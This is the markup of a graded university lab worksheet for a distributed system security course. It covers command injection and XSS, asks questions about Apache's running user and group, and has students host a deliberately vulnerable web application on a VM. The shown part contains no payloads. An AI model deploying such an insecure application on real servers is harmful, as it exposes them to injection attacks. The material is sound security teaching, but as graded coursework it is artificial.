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FD71226" w14:textId="15DB7214" w:rsidR="007770FC" w:rsidRPr="00D657E5" w:rsidRDefault="004D34AD" w:rsidP="00C90142">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7232">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>CYBR 8410 – Distributed System Security – 2021 Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DFFEDD" w14:textId="0057A456" w:rsidR="007770FC" w:rsidRPr="00D657E5" w:rsidRDefault="00C74F51" w:rsidP="00C90142">
      <w:p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La</w:t>
      </w:r>
      <w:r w:rsidR="0025169B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="007770FC" w:rsidRPr="00D657E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D34AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744153ED" w14:textId="77777777" w:rsidR="007770FC" w:rsidRPr="00D657E5" w:rsidRDefault="007770FC" w:rsidP="002815C3">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D657E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Name:</w:t>
      </w:r>
      <w:r w:rsidR="00186146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D657E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>____________________</w:t>
      </w:r>
      <w:r w:rsidR="00417E23" w:rsidRPr="00D657E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>__</w:t>
      </w:r>
      <w:r w:rsidRPr="00D657E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>___</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D9DAB" w14:textId="77777777" w:rsidR="007770FC" w:rsidRPr="00D657E5" w:rsidRDefault="007770FC" w:rsidP="002815C3">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D657E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>NUID:</w:t>
      </w:r>
      <w:r w:rsidR="00822E97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D657E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>_________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD65242" w14:textId="77777777" w:rsidR="00E35002" w:rsidRDefault="00E35002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081E7D1B" w14:textId="77777777" w:rsidR="007E3971" w:rsidRPr="007E3971" w:rsidRDefault="007E3971" w:rsidP="007E3971">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3971">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Please follow the requirements and due date specified in the Syllabus to submit your work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B22118" w14:textId="77777777" w:rsidR="00632692" w:rsidRDefault="008757D2" w:rsidP="008757D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB6FB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Lab Description</w:t>
      </w:r>
      <w:r w:rsidRPr="008757D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC569C" w14:textId="77777777" w:rsidR="00311EB4" w:rsidRPr="008757D2" w:rsidRDefault="00DE33D6" w:rsidP="00DE33D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE33D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Students will identify two types of Web attacks in this Lab. One is Command</w:t>
      </w:r>
      <w:r w:rsidR="0004046E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE33D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Injection attacks, and the other is Cross Site Scripting (XSS) attacks. You need to answer the specified</w:t>
      </w:r>
      <w:r w:rsidR="001536A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE33D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">questions in the following lab content and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE33D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>steps, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE33D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> submit your answers in a PDF or Word file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E835DB0" w14:textId="77777777" w:rsidR="00DB1990" w:rsidRDefault="00DB1990" w:rsidP="008757D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During the lab, if anything is not clear to you, please contact the instructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ADF98F" w14:textId="77777777" w:rsidR="005A712A" w:rsidRDefault="006F5346" w:rsidP="008757D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00704F39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Lab Content and Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4BCDDF" w14:textId="7EC0A25B" w:rsidR="00B05E83" w:rsidRDefault="001B4A32" w:rsidP="001B4A32">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B4A32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Reuse your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>virtual</w:t>
      </w:r>
      <w:r w:rsidRPr="002A748F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidRPr="001B4A32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> created in </w:t>
      </w:r>
      <w:r w:rsidR="00E7013B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>previous labs</w:t>
      </w:r>
      <w:r w:rsidR="00196EE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025C592" w14:textId="77777777" w:rsidR="00757528" w:rsidRDefault="00757528" w:rsidP="00757528">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6419388B" w14:textId="77777777" w:rsidR="00DE1B90" w:rsidRDefault="00DC5B42" w:rsidP="00DE1B90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Command Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B29C7" w14:textId="77777777" w:rsidR="00F12CB5" w:rsidRPr="00F12CB5" w:rsidRDefault="00F12CB5" w:rsidP="00F12CB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799E85BD" w14:textId="77777777" w:rsidR="00F12CB5" w:rsidRDefault="008D529F" w:rsidP="00F12CB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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Start your virtual machine and the Apache 2 Web server</w:t>
      </w:r>
      <w:r w:rsidR="004841C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DAAAE" w14:textId="77777777" w:rsidR="008D529F" w:rsidRDefault="008D529F" w:rsidP="008D529F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="792"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D09BB56" w14:textId="77777777" w:rsidR="008D529F" w:rsidRDefault="008D529F" w:rsidP="00F91FC9">
      <w:pPr>
        <w:ind w:left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Question 1: (5</w:t>
      </w:r>
      <w:r w:rsidR="00FE0062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pt</w:t>
      </w:r>
      <w:r w:rsidR="00FE0062">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0063340C" w14:textId="55D82E61" w:rsidR="00F07F1F" w:rsidRDefault="004E7E88" w:rsidP="00E5480F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008030CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>What are the users and groups pre</w:t>
      </w:r>
      <w:r w:rsidRPr="008030CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r w:rsidRPr="008030CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">created on your </w:t>
      </w:r>
      <w:r w:rsidR="0043239D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="008030CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r w:rsidR="0091100E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E19F456" w14:textId="77777777" w:rsidR="00F07F1F" w:rsidRPr="000026A5" w:rsidRDefault="00F07F1F" w:rsidP="000026A5">
      <w:pPr>
        <w:ind w:left="792"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5964C22F" w14:textId="24511D68" w:rsidR="00B95C12" w:rsidRDefault="004E7E88" w:rsidP="00E5480F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008030CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>What is the main</w:t>
      </w:r>
      <w:r w:rsidR="008030CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008030CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>reason (in terms of security) for creating so many users and groups?</w:t>
      </w:r>
      <w:r w:rsidR="00482560" w:rsidRPr="00482560">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00482560">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A6D27" w14:textId="77777777" w:rsidR="007F06B6" w:rsidRDefault="007F06B6" w:rsidP="00887F63">
      <w:pPr>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD32ABD" w14:textId="7C37B6C8" w:rsidR="00CA5181" w:rsidRDefault="00E45FDF" w:rsidP="00481907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B121F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B121F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000B121F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the running user and running group of those Apache 2 processes?</w:t>
      </w:r>
      <w:r w:rsidR="000B121F" w:rsidRPr="000B121F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF07B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12273C40" w14:textId="77777777" w:rsidR="00481907" w:rsidRPr="00481907" w:rsidRDefault="00481907" w:rsidP="000F04F9">
      <w:pPr>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F57F0BA" w14:textId="006C1DE8" w:rsidR="00CA5181" w:rsidRDefault="00E45FDF" w:rsidP="008A4F62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B121F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Which Apache 2 configurations are used to specify the running user and running</w:t>
      </w:r>
      <w:r w:rsidR="000B121F" w:rsidRPr="000B121F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B121F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">group? </w:t>
      </w:r>
      <w:r w:rsidR="00FF07B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1869030F" w14:textId="77777777" w:rsidR="00CA5181" w:rsidRPr="008C3FF6" w:rsidRDefault="00CA5181" w:rsidP="008C3FF6">
      <w:pPr>
        <w:ind w:left="792"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D46BD3" w14:textId="4F94AD34" w:rsidR="001729E9" w:rsidRDefault="00E45FDF" w:rsidP="008A4F62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B121F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Why </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B121F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>such configurations are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000B121F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> used?</w:t>
      </w:r>
      <w:r w:rsidR="00FF07B6" w:rsidRPr="00FF07B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF07B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470BC9D9" w14:textId="77777777" w:rsidR="006F059A" w:rsidRDefault="006F059A" w:rsidP="009A306A">
      <w:pPr>
        <w:ind w:left="115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14:paraId="2A4B53DD" w14:textId="77777777" w:rsidR="00D17598" w:rsidRDefault="00666DE3" w:rsidP="00A675F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666DE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Host the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666DE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>extremeinsecure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666DE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web application on your Apache Web server by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD0A72" w14:textId="77777777" w:rsidR="00B969FB" w:rsidRDefault="00B969FB" w:rsidP="00795054">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Copy</w:t>
      </w:r>
      <w:r w:rsidR="00236C52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“</w:t>
      </w:r>
      <w:r w:rsidR="00795054" w:rsidRPr="00795054">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>extremeinsecure.tar.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="003C257B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to your VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E683FF" w14:textId="77777777" w:rsidR="003C257B" w:rsidRDefault="00B35319" w:rsidP="00575E80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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E</w:t>
      </w:r>
      <w:r w:rsidR="00575E80" w:rsidRPr="00575E80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">xtract </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00575E80" w:rsidRPr="00575E80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00575E80" w:rsidRPr="00575E80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tar.gz file to the appropriate directory of the Apache 2 Web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E62732E" w14:textId="77777777" w:rsidR="00BE7025" w:rsidRDefault="009E02F8" w:rsidP="002C2483">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00452CEF" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>roperly set the permissions of the extracted directory and files so that the nine .htm</w:t>
      </w:r>
      <w:r w:rsidR="006A03C4" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00452CEF" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">and one .php webpages in the </w:t>
      </w:r>
      <w:r w:rsidR="003368E9" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
